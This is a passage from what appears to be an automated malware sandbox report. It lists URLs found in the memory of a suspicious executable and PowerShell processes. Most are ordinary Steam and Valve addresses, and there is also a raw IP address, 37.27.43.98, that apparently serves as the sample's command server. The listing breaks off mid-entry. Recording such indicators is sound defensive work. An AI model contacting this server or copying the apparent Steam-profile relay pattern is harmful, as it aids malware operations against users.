Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://37.27.43.98
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://37.27.43.98/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://37.27.43.98/R
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://37.27.43.98/j
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://37.27.43.98/k
Source: powershell.exe, 00000002.00000002.2031133778.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2031133778.0000000004E29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2021300435.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2188708233.0000000004BCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2188708233.0000000004BB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162024820.0000000005201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2362908303.0000000004669000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2362908303.0000000004678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.0000000004A51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
Source: 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cloudflare.steamstatic
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: https://community.cloudflare.steamsta
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbS
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&amp;l=english&am
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&amp;l=engli
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&amp;l=en
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 